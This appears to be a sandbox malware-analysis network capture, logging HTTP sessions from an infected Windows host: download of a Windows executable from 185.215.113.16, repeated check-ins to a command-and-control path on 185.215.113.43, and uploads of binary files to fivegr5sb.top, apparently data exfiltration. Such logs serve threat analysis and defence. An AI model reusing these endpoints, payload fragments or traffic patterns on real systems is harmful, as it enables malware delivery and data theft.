                                                                                                                                                                                              Dec 16, 2024 01:04:19.138300896 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:04:19.138318062 CET1236INData Raw: d2 c0 9d 1d aa 1d 9f e2 32 0c 9d 5a 23 42 fa 0c cf 59 04 fd 8f f7 f0 bc 5e d2 d2 db f8 57 63 f2 8a 44 49 81 f4 35 24 3d db 8d da 12 04 fb 8e dd 3f d3 be 0c 7c c6 91 d8 31 f5 9b d6 41 cb 55 ef 43 be ae 1c aa c9 aa 34 8e e2 bd d2 1f dc 9b 6d 6c a5
                                                                                                                                                                                              Data Ascii: 2Z#BY^WcDI5$=?|1AUC4mlWu3##B*5FnzvV(e5a rx9J:D6K)=LQ#W/}>$D4.^A3E+6CRYY;Xu
                                                                                                                                                                                              Dec 16, 2024 01:04:19.139067888 CET1236INData Raw: be c1 b4 32 e6 c1 b8 fe ce ac 3d 13 29 e4 b2 8b 70 ec ae 16 a2 f7 d0 fb 5f 49 d9 22 46 04 a9 1d 70 ec e8 fc d1 24 ed 1f d7 b7 2a 9b 46 c1 f4 1c 70 20 b5 4a a2 08 05 11 94 5d 0f 57 6e e4 10 f4 9f e5 48 77 29 40 a2 a4 46 44 c1 1d b0 d5 28 6b b8 7c
                                                                                                                                                                                              Data Ascii: 2=)p_I"Fp$*Fp J]WnHw)@FD(k|1?8]@.h@p5x:8 BIpl$qq)6y@X9I/]PSQ=^)g s8,.8~m$@xD)Z]FM?4
                                                                                                                                                                                              Dec 16, 2024 01:04:19.139122963 CET1236INData Raw: 87 de ad 23 9c fc b4 ef 82 29 65 1d 3b a8 a4 91 35 b7 b6 4a 76 d1 d8 c3 2a 1a e4 3b 95 9c 0a c1 8c e9 e2 4d 34 3d d7 e1 c0 1b 8a f0 4f d6 e9 b3 80 c4 08 2d 26 27 26 3f 40 b4 12 3f 91 17 05 78 b8 d1 00 0c 42 1b f9 25 37 8e 49 1e ae 71 ce 6e f3 aa
                                                                                                                                                                                              Data Ascii: #)e;5Jv*;M4=O-&'&?@?xB%7IqnO}}Zb-RnPJiH8-D7HJx.80LfGbBv1FHJ_#&I42'nTLHB6W8!2AO
                                                                                                                                                                                              Dec 16, 2024 01:04:19.258342981 CET1236INData Raw: 2e 09 7e c7 58 d8 93 f6 53 5c 9a e1 0c b8 d6 fd 23 d1 a2 5d 24 d8 f4 ea 20 ee 80 43 27 c9 7f 0e 24 c8 fa 28 71 d5 46 b0 a3 9d 90 54 85 87 b2 8b 6f 82 0d 22 87 26 bd da 6f b6 a6 31 8e 15 01 29 1e 23 ff 1f 94 17 f6 cb f0 e1 9f ad e0 2b 04 60 90 9c
                                                                                                                                                                                              Data Ascii: .~XS\#]$ C'$(qFTo"&o1)#+`'!M,i2L_187OS{xzR^O *.(J6G?~*z763Bh.X()4L$IbCk+D?Xq!
                                                                                                                                                                                              Dec 16, 2024 01:04:29.814977884 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:04:30.258089066 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:29 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1836544
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:57:32 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6cec-1c0600"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg*j@jN@M$a$$ $h@.rsrc$x@.idata $z@ `+$|@skauaiwmp Pb~@npkvhzbcj@.taggant0j"@


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              46192.168.2.450143185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:20.261430979 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:04:21.350260019 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:21 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              47192.168.2.450144185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:24.575738907 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:04:25.679685116 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:25 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              48192.168.2.450146141.8.192.14180
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:27.556540966 CET643OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                              Host: fivegr5sb.top
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------gsBFwwUzdEjIk9U5Tn56ls
                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 67 73 42 46 77 77 55 7a 64 45 6a 49 6b 39 55 35 54 6e 35 36 6c 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 61 6e 65 72 75 6c 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a e6 24 3d f9 08 db a7 2c a0 fe 55 93 01 4b 33 9c 52 8f 65 bd a4 3a 38 28 bf 65 3e 26 af 39 68 d8 c7 ae 39 20 e7 19 38 97 d0 fe 26 8d 27 c8 47 26 01 aa ac 8b 0d 24 86 5b c9 26 9f b1 a7 6d d5 9b b3 9f 87 d7 bc 7c 17 51 d3 43 02 04 ce eb 29 9f c5 e0 43 66 87 44 7c 0e 2e 91 0c 3c 26 b5 31 6d 32 02 79 fe 4c 78 bb 27 e8 c2 62 98 80 c1 48 ec 4f 0d 65 cb 1a 9c 47 ac 7c e5 13 99 1d 1b c9 d4 02 22 86 a6 32 ba d2 a9 94 24 21 03 e6 73 e5 7d 61 6c 73 16 86 e2 f4 04 e3 ec 62 d0 20 4e 8c 65 75 92 35 23 12 3e 90 af 4c 5e 89 80 e3 4d a8 8b [TRUNCATED]
                                                                                                                                                                                              Data Ascii: --------------------------gsBFwwUzdEjIk9U5Tn56lsContent-Disposition: form-data; name="file"; filename="Caneruli.bin"Content-Type: application/octet-stream$=,UK3Re:8(e>&9h9 8&'G&$[&m|QC)CfD|.<&1m2yLx'bHOeG|"2$!s}alsb Neu5#>L^MEg$;[@ghj3F:CbG_,6+#4--------------------------gsBFwwUzdEjIk9U5Tn56ls--
                                                                                                                                                                                              Dec 16, 2024 01:04:28.892026901 CET255INHTTP/1.1 200 OK
                                                                                                                                                                                              server: nginx
                                                                                                                                                                                              date: Mon, 16 Dec 2024 00:04:28 GMT
                                                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                              x-ratelimit-limit: 30
                                                                                                                                                                                              x-ratelimit-remaining: 29
                                                                                                                                                                                              x-ratelimit-reset: 1734309269
                                                                                                                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                                                              Data Ascii: OK


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              49192.168.2.450147185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:28.289746046 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:04:29.435048103 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:29 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              50192.168.2.450149141.8.192.14180
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:30.987070084 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                              Host: fivegr5sb.top
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Content-Length: 71884
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------HY7Kjuc07AF6HEJX0B2EDB
                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 59 37 4b 6a 75 63 30 37 41 46 36 48 45 4a 58 30 42 32 45 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 69 67 61 76 6f 6d 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 31 f4 ac cf df e6 d4 3f 4b 07 3e 25 d2 01 ec 80 eb a1 44 66 a3 6a 8d ab b3 c0 4e 36 b6 10 9a f8 9b b4 c5 56 09 e1 ad 9f 0f 8b 1e 4f 5f 7c 11 4c 34 89 e2 f3 eb 34 a0 cf 1a e7 d8 87 12 f1 73 b3 1c e4 7a cc 66 7d 89 43 07 6c 20 d5 c8 2f 8c 04 bd 7e 98 2e 57 88 88 ca 7b 69 54 57 8d 6a 6c 58 91 6c c6 43 03 b5 de ff 97 b1 21 d3 81 9e 5d d3 f7 23 ac f3 d7 eb 92 d5 bb 5d 6d f0 d7 8a 15 87 9c 8e b3 f8 65 17 e4 c6 db 85 98 6b 92 5f e1 14 cd d6 90 d1 e0 c7 3e 29 53 8a 67 a9 39 77 e7 fe 05 ad 3f d7 f2 59 f1 18 b9 fe 9d e7 e1 16 d4 28 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: --------------------------HY7Kjuc07AF6HEJX0B2EDBContent-Disposition: form-data; name="file"; filename="Vigavomu.bin"Content-Type: application/octet-stream1?K>%DfjN6VO_|L44szf}Cl /~.W{iTWjlXlC!]#]mek_>)Sg9w?Y(C:Qp#n*c7D~R<U^A0edwVZYi|\;"QYD -`Z* h\|>djO.Ctahz]Olisx4Zaj""Yl`iJ+|KK=4@>}S"P(?l{@Dbev,e10T]f@='|4EI5VqW{gX'S,frz0(z^-OLcZH#[3D|NIAK7ow3~@um~0 v&icnTLP\_e/hza-4puL<x}*V{"QG`Jh.f)xBWWf]Y\b[W*LhIpPy?1B\2|54jRn[(GV8gpks$TjDmg7Ifq_Hwyta1w(%T/D7=Op [TRUNCATED]
                                                                                                                                                                                              Dec 16, 2024 01:04:31.107053995 CET7416OUTData Raw: 98 f9 d2 16 50 51 ca 83 d1 41 3f 74 53 f5 a2 46 d0 24 c7 80 63 a2 01 6d ce 28 6b b1 22 dd da 9f 2a 7e ac 33 8d a3 23 1b 9b 71 00 7f bd 35 5d 70 83 ed 65 46 e0 ce 98 b2 3c 6e 84 87 b4 ec cc b7 6d 8d 52 5b 83 46 c0 f5 7f a6 ef e7 29 c4 80 03 3c 59
                                                                                                                                                                                              Data Ascii: PQA?tSF$cm(k"*~3#q5]peF<nmR[F)<Y)?>tu"V7[O[EEuDj{)5}zgXw$@tV\s0GyEUD^AS:p*Bte/ljm%v=X6fX]9_
                                                                                                                                                                                              Dec 16, 2024 01:04:31.107215881 CET2472OUTData Raw: 75 c6 79 ac ee ce 27 9c 0c fd 6f ad d6 ae 83 9e f6 4a c5 5d 14 3e c2 51 63 60 e5 4b 82 7c 93 73 57 31 46 c1 57 72 2b 0d b3 31 19 33 f7 f8 2f 0d 9b 86 f8 4a 82 56 77 d1 1d fe fa 4a 33 ff f2 34 eb e7 09 3b 87 6c fe bd 63 86 ae 29 ad 2d 0b 6d a4 91
                                                                                                                                                                                              Data Ascii: uy'oJ]>Qc`K|sW1FWr+13/JVwJ34;lc)-mp;k0B_+8qz(6@8ZlYCu&y/`3{JZUPch9sAu5VsNd@nTfKrX%OkA\_&*Pu$iu
                                                                                                                                                                                              Dec 16, 2024 01:04:31.107258081 CET7416OUTData Raw: 3e 22 f3 39 2f 30 00 17 55 04 c4 15 91 38 33 d8 69 7f 32 2f d4 43 6c ef cd 24 f6 84 bf c7 91 d2 84 09 3f 05 08 d5 7e 3c f1 81 0b f8 5f 72 03 64 45 e3 c9 c3 b0 70 44 41 47 f3 d5 24 be af 28 92 26 e8 01 f2 9d 7c 1d 55 05 ed 2f 03 4d 78 f7 4d 25 91
                                                                                                                                                                                              Data Ascii: >"9/0U83i2/Cl$?~<_rdEpDAG$(&|U/MxM%Kxk{&&>')EJUB9$AqM)~l|#C}9v8%D&uT-RA$Z:3&:k*&-3\)bgY?^
                                                                                                                                                                                              Dec 16, 2024 01:04:31.107460976 CET4944OUTData Raw: 80 3b c8 a4 84 58 a4 60 fa 49 c2 f1 1c f3 a9 33 9b 81 de ac 03 3e 7b 2d 3a d2 35 fd 6d 74 1b 5b 47 30 db d2 c8 91 f7 cc ca 18 19 73 e0 eb b9 15 82 cb 93 73 51 06 98 24 69 8c 71 f2 ee 14 a9 ab 52 4d 4f 32 2a 5b 34 6e bb d3 29 9f 25 71 59 c9 eb 53
                                                                                                                                                                                              Data Ascii: ;X`I3>{-:5mt[G0ssQ$iqRMO2*[4n)%qYSL-Q+2U5]:=$-;CXkzw<t<9Luq_OfBIDV3AspHe_%'p#fD^)10dhf95i5w.
                                                                                                                                                                                              Dec 16, 2024 01:04:31.107510090 CET2472OUTData Raw: bf 1b 99 ec b2 b7 9f a9 f3 49 5a 88 c2 4a 24 e6 d3 70 60 8d 07 0e a8 da 3d 16 00 68 0a 1e 94 33 c4 1d 9e 4b e7 6f e3 02 01 ca 13 24 97 9c 29 39 c6 a7 e9 66 ee 23 0d 0b 8a 06 ab 8d 06 ae ba c2 ba 03 76 29 67 eb d0 61 b1 9d 35 03 d6 58 e7 0a 0f 5d
                                                                                                                                                                                              Data Ascii: IZJ$p`=h3Ko$)9f#v)ga5X]No,QD[$i8)gOD{WL@PGREcuF'xFaMS`Kx*p',ySkz Ou6= ^*@!<"H%Q?W"cF
                                                                                                                                                                                              Dec 16, 2024 01:04:31.227073908 CET4944OUTData Raw: 26 5e 98 53 45 31 34 2a 74 c6 e6 63 6a f4 36 5a de cb e1 ab 9c e4 2f 37 c8 8e 5b f2 bd d1 de 36 8d 8c cb 59 63 fd 23 e8 b7 bf 46 8a ac b1 7a 4c f9 20 86 79 6a 57 22 f2 60 5d ef c8 af 99 ff 27 cd f2 f6 68 7c 55 6e 8b 65 bf d0 3e be d4 9d 42 78 51
                                                                                                                                                                                              Data Ascii: &^SE14*tcj6Z/7[6Yc#FzL yjW"`]'h|Une>BxQ4_P8pF[uf+z7e9+)-SY,4A&xA}m!7'nOUxR]PiTn@?yCuB}oRwG'K1
                                                                                                                                                                                              Dec 16, 2024 01:04:31.227128029 CET2472OUTData Raw: 6c ab 1a 80 86 b4 d5 3d de 20 68 9d ce 2a 7f d5 ca ae 86 b6 76 f7 2b d3 bb a6 2d c5 72 a8 de a5 4d 56 1a 2f 09 62 2f a8 12 11 e2 8d 61 9a bd 26 28 60 57 cb 09 42 69 34 47 fa 18 e0 e1 dc 34 26 83 91 60 ec f9 de cc f6 f2 ed e8 c6 e2 08 01 52 1b da
                                                                                                                                                                                              Data Ascii: l= h*v+-rMV/b/a&(`WBi4G4&`R_5f,XzCbF(V.;yT~Eshr1%Q+2ym-*"D-"^TnMxE`#saFI`A75L56NzqQBBU
                                                                                                                                                                                              Dec 16, 2024 01:04:31.227154970 CET2472OUTData Raw: 49 b4 49 5a d3 e3 ea a7 17 59 f9 9a fd 9d 6c df ec 9d 74 f3 5f f3 9e c9 73 c1 34 10 dd 00 4e f0 76 8b e5 8d 45 85 39 c1 cb 2d 78 cc 48 b9 d2 9d 54 84 c4 5c 93 24 0e bd ca 65 70 2d 5e b7 12 b3 bc aa 2c 2f 46 20 d0 06 6c 79 67 1b 47 f7 de 78 8c 96
                                                                                                                                                                                              Data Ascii: IIZYlt_s4NvE9-xHT\$ep-^,/F lygGx$b}XZUqSp_<0i61`q":n["ipN[@#Ri<eD3]g.:> SKY%WU#%VD..9f
                                                                                                                                                                                              Dec 16, 2024 01:04:31.227296114 CET2472OUTData Raw: 12 0c 0b 5d a3 a4 20 16 19 4a 2f d0 45 ef ee 87 1a 2b 84 c0 95 d9 12 57 3c 76 46 01 c9 14 e9 84 30 dd 08 f0 d9 bd 4a 33 b5 97 5b 73 61 45 17 c0 87 a7 5f 5a ca 04 fd 63 a2 a2 67 02 d3 14 8d d8 94 ef 15 0b 37 03 9a 54 e6 dd 1a d1 d4 8c 74 ab cc d5
                                                                                                                                                                                              Data Ascii: ] J/E+W<vF0J3[saE_Zcg7Ttb+wiu8%plGtqw*JPM@^c C!*SEd(vpCJaOlWkz4K8 G;[9ctoI_Dt4#?_t+28KDBdtj;}9
                                                                                                                                                                                              Dec 16, 2024 01:04:31.227320910 CET2472OUTData Raw: 51 4b 6b 74 dd 33 ae 49 e3 4b 57 f5 f4 2f d8 c7 95 d4 58 10 0c e8 e3 54 dc ca 9f 0a 42 eb 54 18 67 85 f9 b3 ed e2 02 89 1e 41 2b 3e 2b 40 62 74 85 8c 08 bd 84 b8 21 ca fe 42 76 fa d2 8c b7 e1 01 be 42 ff ec 29 42 a7 d1 db e0 d2 ef 9c 1a 86 fe 3d
                                                                                                                                                                                              Data Ascii: QKkt3IKW/XTBTgA+>+@bt!BvB)B=FLQ$kQ<pGwrB|)vG+X@{cv(Dz?G&5Wf$N>tM}A\=8eSB.Qa_gzi]wg=l##pxKAaOXd
                                                                                                                                                                                              Dec 16, 2024 01:04:32.803061008 CET255INHTTP/1.1 200 OK
                                                                                                                                                                                              server: nginx
                                                                                                                                                                                              date: Mon, 16 Dec 2024 00:04:32 GMT
                                                                                                                                                                                              content-type: text/plain; charset=utf-8
                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                              x-ratelimit-limit: 30
                                                                                                                                                                                              x-ratelimit-remaining: 28
                                                                                                                                                                                              x-ratelimit-reset: 1734309269
                                                                                                                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                                                              Data Ascii: OK


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              51192.168.2.450154185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:32.655385017 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:04:33.715639114 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:33 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              52192.168.2.450159185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:36.651987076 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                              Dec 16, 2024 01:04:37.647741079 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:37 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              53192.168.2.450166185.215.113.4380
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:04:42.079098940 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                              Dec 16, 2024 01:04:43.054903030 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:04:42 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                              HTTPS Proxied Packets

